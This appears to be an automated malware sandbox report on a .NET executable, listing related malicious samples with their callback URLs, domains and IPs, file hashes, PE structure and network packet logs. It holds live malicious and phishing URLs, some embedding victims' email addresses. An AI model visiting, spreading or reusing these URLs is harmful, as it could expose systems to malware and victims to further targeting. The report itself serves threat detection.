	9qB3tPamJa.exe	Get hash	malicious	Browse	www.urbanocity.store/cia6/?jFNl2N=LUkSQMUqYs7d/2/bQOaEkxwm6h1839rWxFY8smdD3nXH8S9l405T6SEnCwX9eUfgpMcI&oX=_0Gxtp50WtBTh
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	www.tuandyocollection.com/o9b2/?u6u4=4u1+S9oSK4nstT4jNXOLKZbiFeL6aAnN2nRxn3s4rrQDR63bTgJncZI5SfyJVXhtI5sI&J484=xPJtLXbX
	RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exe	Get hash	malicious	Browse	www.datilerabotique.com/vrf/?-Zi=W6RxUV3PO&jVgH=zZDHshi4Pkd0P2Vpy5GFv9MKLH+ZM1DgmcjI3w6ycoE5KItthN6fBKorEr45KSVJ/Kq+
	ALPHA_PO_16201844580.exe	Get hash	malicious	Browse	www.brileh.com/ihj8/?FDHH=kp1TyTNK2TfuAAxDHOaKlJ15BQElGFL/Q3eeESeMemH8ItjJfxH4T076vYWIe4YDF7Ys&Rl=VtxXE
	New Additional Agreement.exe	Get hash	malicious	Browse	www.ruffstuffstore.com/bw82/?J2JxbNH=F3MU/Kc9rzkv3+20WLBKi+7XbNe8+wVKAq98A/O7YoJHgqMODA/UAiCFbu5irG5nl0Gy&BXEpz=Z2Jd8XTPeT
	sipari#U015f #U00f6zelli#U011fi.exe	Get hash	malicious	Browse	www.shealetics.com/kvsz/?MZBd=pyqPkBONPCXFxqPz4KsKvAuTNXQUgDbZ3J9fAIoMlnMKdo+zxz753OdtOPLvMHpQpZ2siukHtw==&u6u49=bjopdnoHu6vPPT
	rvNT4kv6bg.exe	Get hash	malicious	Browse	www.ragdollmafia.com/xnc/?AbvxNjd=LLp5sBfRfEb8C8Y7ovaBcIS1tPGvw3XmCrdvIeV7+nVuizjJpwa7ct0G5dTBu4flngfG&0rn=WHr8JjC8t
	fatura.exe	Get hash	malicious	Browse	www.nairobi-paris.com/hko6/?Mln=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&U48tf=Ntx0P4L0UTCht6D
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	www.latinaexpres.com/bw82/?K4k0=MH8aeG+uv4aCbfCRrZwRssY8CBuQ73rTgBLgsoEJobo1qpmthBUfRE7zHxZh8QhM+w6Y&dDH=P0GPezWpdVGtah
	Zahlung-06.11.20.exe	Get hash	malicious	Browse	www.thejjluxe.com/dn87/?s0=D48TxL4H6JsL&8pn=4mEIxGVUFIj4nxvETlvf5jB8mDgPBMXgmrBaKXQ2dITKbac5O6ttK9phZp36CtVkQTq9

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.tnicholson.design	Order List.xlsx	Get hash	malicious	Browse	65.254.250.119
ext-sq.squarespace.com	kayx.exe	Get hash	malicious	Browse	198.185.159.141
	BANK ACCOUNT INFO!.exe	Get hash	malicious	Browse	198.49.23.141
	Purchase Order 40,7045.exe	Get hash	malicious	Browse	198.49.23.141
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	198.49.23.141
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	198.49.23.141
	dB7XQuemMc.exe	Get hash	malicious	Browse	198.49.23.141
	hRVrTsMv25.exe	Get hash	malicious	Browse	198.49.23.141
	v6k2UHU2xk.exe	Get hash	malicious	Browse	198.185.159.141
	NzI1oP5E74.exe	Get hash	malicious	Browse	198.49.23.141
	PO.exe	Get hash	malicious	Browse	198.49.23.141
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	198.185.159.141
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	198.49.23.141
	scnn7676766.exe	Get hash	malicious	Browse	198.185.159.144
	price quote.exe	Get hash	malicious	Browse	198.185.159.145
	t64.exe	Get hash	malicious	Browse	198.185.159.144
	Preview_Annual.xlsb	Get hash	malicious	Browse	198.49.23.145
	Se adjunta un nuevo pedido.exe	Get hash	malicious	Browse	198.49.23.145
	wPthy7dafVcH94f.exe	Get hash	malicious	Browse	198.49.23.144
	54nwZp1aPg.exe	Get hash	malicious	Browse	198.49.23.144
	uiy3OAYIpt.exe	Get hash	malicious	Browse	198.185.159.144
shops.myshopify.com	Order specs19.11.20.exe	Get hash	malicious	Browse	23.227.38.64
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	23.227.38.64
	SWIFT_HSBC Bank.exe	Get hash	malicious	Browse	23.227.38.64
	ORDER SPECIFITIONS.exe	Get hash	malicious	Browse	23.227.38.64
	anthony.exe	Get hash	malicious	Browse	23.227.38.64
	udtiZ6qM4s.exe	Get hash	malicious	Browse	23.227.38.64
	qAOaubZNjB.exe	Get hash	malicious	Browse	23.227.38.64
	uM0FDMSqE2.exe	Get hash	malicious	Browse	23.227.38.64
	new file.exe.exe	Get hash	malicious	Browse	23.227.38.64
	jrzlwOa0UC.exe	Get hash	malicious	Browse	23.227.38.64
	PDF ICITIUS33BUD10307051120003475.exe	Get hash	malicious	Browse	23.227.38.64
	HN1YzQ2L5v.exe	Get hash	malicious	Browse	23.227.38.64
	xMH0vGL2UY.exe	Get hash	malicious	Browse	23.227.38.64
	9qB3tPamJa.exe	Get hash	malicious	Browse	23.227.38.64
	http://ecoair.org	Get hash	malicious	Browse	23.227.38.64
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	23.227.38.64
	http://ecoair.org	Get hash	malicious	Browse	23.227.38.64
	RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exe	Get hash	malicious	Browse	23.227.38.64
	ALPHA_PO_16201844580.exe	Get hash	malicious	Browse	23.227.38.64
	New Additional Agreement.exe	Get hash	malicious	Browse	23.227.38.64

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLAYERLIMITED-AS-APClayerLimitedHK	ant.exe	Get hash	malicious	Browse	160.122.149.206
	nass.exe	Get hash	malicious	Browse	164.88.89.9
	new file.exe.exe	Get hash	malicious	Browse	168.206.237.116
	Zahlung-06.11.20.exe	Get hash	malicious	Browse	155.159.204.214
	7x7HROymud.exe	Get hash	malicious	Browse	160.121.58.239
	PLAN ORDER DURAN.exe	Get hash	malicious	Browse	160.121.180.19
	BANK TRANSFER SLIP.exe	Get hash	malicious	Browse	155.159.33.54
	PO_7801.exe	Get hash	malicious	Browse	164.88.101.212
	Payment Advice - Advice Ref[GLV824593835].exe	Get hash	malicious	Browse	164.88.81.242
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	168.206.49.204
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	164.88.89.161
	New Purchase Order 50,689$.exe	Get hash	malicious	Browse	164.88.89.161
	New Purchase Order 50,689$.exe	Get hash	malicious	Browse	160.121.14.148
	New Purchase Order 50,689$.exe	Get hash	malicious	Browse	164.88.89.161
	SecuriteInfo.com.Exploit.Siggen2.47709.12233.rtf	Get hash	malicious	Browse	160.121.132.40
	mp0nMsMroT.exe	Get hash	malicious	Browse	155.159.203.193
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.20877.rtf	Get hash	malicious	Browse	155.159.203.193
	01d07.exe	Get hash	malicious	Browse	160.122.212.17
GOOGLEUS	vOKMFxiCYt.exe	Get hash	malicious	Browse	34.102.136.180
	com.fdhgkjhrtjkjbx.model.apk	Get hash	malicious	Browse	216.58.212.163
	http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.com	Get hash	malicious	Browse	172.217.16.193
	https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.com	Get hash	malicious	Browse	172.217.16.193
	https://docs.google.com/document/d/e/2PACX-1vS19QxlBmfgZPBsUyM3LjkhvVA-TJ0Z_P3J8f_cqg7VN4_zRcrthLeTjZzAubcBh9YWnC0ty3FtmofH/pub	Get hash	malicious	Browse	172.217.16.193
	https://sites.google.com/site/id500800931/googledrive/share/downloads/storage?FID=6937265496484	Get hash	malicious	Browse	172.217.16.193
	https://docs.google.com/document/d/e/2PACX-1vSF_0NxJ4W_JaHZNaHV7imTfN6FtP563leR3WEEVqre35gDV9YM55P9l-6Y-B1gmL7J7GW--QSF89LQ/pub	Get hash	malicious	Browse	172.217.16.193
	https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-us	Get hash	malicious	Browse	172.217.23.161
	http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1	Get hash	malicious	Browse	172.217.21.195
	https://bit.ly/35MTO80	Get hash	malicious	Browse	172.217.23.161
	Order List.xlsx	Get hash	malicious	Browse	34.102.136.180
	BANK ACCOUNT INFO!.exe	Get hash	malicious	Browse	35.230.2.159
	http://global.krx.co.kr/board/GLB0205020100/bbs#view=649	Get hash	malicious	Browse	108.177.15.155
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	34.102.136.180
	invoice.exe	Get hash	malicious	Browse	34.102.136.180
	TR-D45.pdf.exe	Get hash	malicious	Browse	34.102.136.180
	knitted yarn documents.exe	Get hash	malicious	Browse	172.253.120.109
	86dXpRWnFG.exe	Get hash	malicious	Browse	34.102.136.180
	https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.php	Get hash	malicious	Browse	172.217.16.130
	b0408bca49c87f9e54bce76565bc6518.exe	Get hash	malicious	Browse	74.125.34.46
CLOUDFLARENETUS	http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.com	Get hash	malicious	Browse	104.16.19.94
	https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.com	Get hash	malicious	Browse	104.16.19.94
	ARjQJiNmBs.exe	Get hash	malicious	Browse	104.18.88.101
	1piS4PBvBp.exe	Get hash	malicious	Browse	104.18.88.101
	https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-us	Get hash	malicious	Browse	104.26.9.44
	New Order.exe	Get hash	malicious	Browse	104.23.98.190
	PURCHASE ORDER.exe	Get hash	malicious	Browse	104.16.155.36
	https://eagleeyeproduce-my.sharepoint.com/:o:/p/mckrayp/EtopxtQDn3pOqhvY4g_gG3ABKX9ornSoGNhGOLlXyaU89Q?e=Ee0wW2	Get hash	malicious	Browse	104.16.19.94
	https://certified1.box.com/s/2ta9r7cyn5g09fblryd9xqqpnfxbjqej	Get hash	malicious	Browse	104.16.19.94
	Report.464129889.doc	Get hash	malicious	Browse	104.28.21.160
	SecuriteInfo.com.Trojan.PWS.StealerNET.67.29498.exe	Get hash	malicious	Browse	104.28.29.208
	http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1	Get hash	malicious	Browse	104.18.27.190
	https://ubereats.app.link/cwmLFZfMz5?%243p=a_custom_354088&%24deeplink_path=promo%2Fapply%3FpromoCode%3DRECONFORT7&%24desktop_url=tracking.spectrumemp.com/el?aid=8feeb968-bdd0-11e8-b27f-22000be0a14e&rid=50048635&pid=285843&cid=513&dest=overlordscan.com/cmV0by5tZXR6bGVyQGlzb2x1dGlvbnMuY2g=%23#kkowfocjoyuynaip#	Get hash	malicious	Browse	104.24.97.83
	https://hastebin.com/raw/xatuvoxixa	Get hash	malicious	Browse	104.24.126.89
	https://bit.ly/35MTO80	Get hash	malicious	Browse	104.31.69.156
	Order List.xlsx	Get hash	malicious	Browse	104.24.122.89
	USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE	Get hash	malicious	Browse	162.159.133.233
	Request for quotation.xlsx	Get hash	malicious	Browse	172.67.181.41
	MV TBN.exe	Get hash	malicious	Browse	104.28.5.151
	PO 20-11-2020.pps	Get hash	malicious	Browse	172.67.22.135
SQUARESPACEUS	vOKMFxiCYt.exe	Get hash	malicious	Browse	198.49.23.141
	kayx.exe	Get hash	malicious	Browse	198.185.159.141
	BANK ACCOUNT INFO!.exe	Get hash	malicious	Browse	198.49.23.141
	http://WWW.ALYSSA-J-MILANO.COM	Get hash	malicious	Browse	198.185.159.141
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	198.49.23.141
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	198.49.23.177
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	198.49.23.141
	NEW PO.exe	Get hash	malicious	Browse	198.185.159.141
	p8LV1eVFyO.exe	Get hash	malicious	Browse	198.49.23.177
	dB7XQuemMc.exe	Get hash	malicious	Browse	198.49.23.141
	hRVrTsMv25.exe	Get hash	malicious	Browse	198.49.23.141
	qkN4OZWFG6.exe	Get hash	malicious	Browse	198.185.159.144
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	198.185.159.144
	NzI1oP5E74.exe	Get hash	malicious	Browse	198.49.23.141
	IQtvZjIdhN.exe	Get hash	malicious	Browse	198.49.23.177
	PO.exe	Get hash	malicious	Browse	198.49.23.141
	148wWoi8vI.exe	Get hash	malicious	Browse	198.49.23.177
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	198.185.159.141
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	198.49.23.141
	scnn7676766.exe	Get hash	malicious	Browse	198.185.159.144

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.8534634080579835
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	NQQWym075C.exe
File size:	552960
MD5:	bf75ed61e1b1f7b310ec1d999077c4dd
SHA1:	cdced77e176e38ff459cdea08941de26861647cd
SHA256:	69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
SHA512:	d2fa7f6e1e41bebedbdba492a163b8388f2326b92d939e9352c32f5be5a311bb75e4374524b2b314b5a426763113935e00f4c81aacc26ed08e9c9dd356dd7510
SSDEEP:	12288:iYHsi433VV/WKmD8UT9Qw4RB07JglwNtAyYtoUqqwyniC:7Hs73NmD/6w4yOwrC9qgi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Wt._.................h............... ........@.. ..............................p.....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x48868e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB77457 [Fri Nov 20 07:46:31 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x88640	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x86694	0x86800	False	0.902309261733	data	7.85956112401	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0x242	0x400	False	0.310546875	data	3.56952524932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x8a058	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/20/20-20:13:59.024360	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49728	34.102.136.180	192.168.2.3
11/20/20-20:14:04.252129	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49730	34.102.136.180	192.168.2.3
11/20/20-20:14:09.492539	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49731	23.227.38.64	192.168.2.3
11/20/20-20:15:02.891478	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49744	35.186.238.101	192.168.2.3
11/20/20-20:15:13.160153	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49745	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 20:13:47.553219080 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.686038971 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.686278105 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.686299086 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.821281910 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824301004 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824321985 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824343920 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824366093 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824382067 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824397087 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824414968 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824433088 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.824434042 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824450016 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824465036 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.824498892 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.824779987 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.957201004 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957236052 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957262039 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957285881 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957298994 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.957326889 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.957753897 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957788944 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957815886 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957834005 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.957839966 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957864046 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957880020 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.957886934 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957911968 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957928896 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.957936049 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957959890 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.957984924 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.958003998 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.958013058 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.958031893 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.958036900 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.958061934 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.958076000 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.958086014 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.958110094 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.958133936 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:47.958134890 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:47.958353043 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.089970112 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090013027 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090038061 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090060949 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090070963 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.090084076 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090110064 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090137005 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090148926 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.090163946 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090183973 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.090274096 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.090281963 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.090629101 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090656042 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090675116 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.090678930 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090703964 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.090722084 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.090804100 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091305017 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091332912 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091353893 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091358900 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091388941 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091394901 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091415882 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091428995 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091442108 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091463089 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091469049 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091494083 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091494083 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091515064 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091521025 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091538906 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091546059 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091564894 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091573000 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091589928 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091600895 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091619968 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091628075 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091645002 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091653109 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091675043 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091676950 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091701031 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091701984 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091727018 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091727018 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091747999 CET	49726	80	192.168.2.3	198.49.23.141
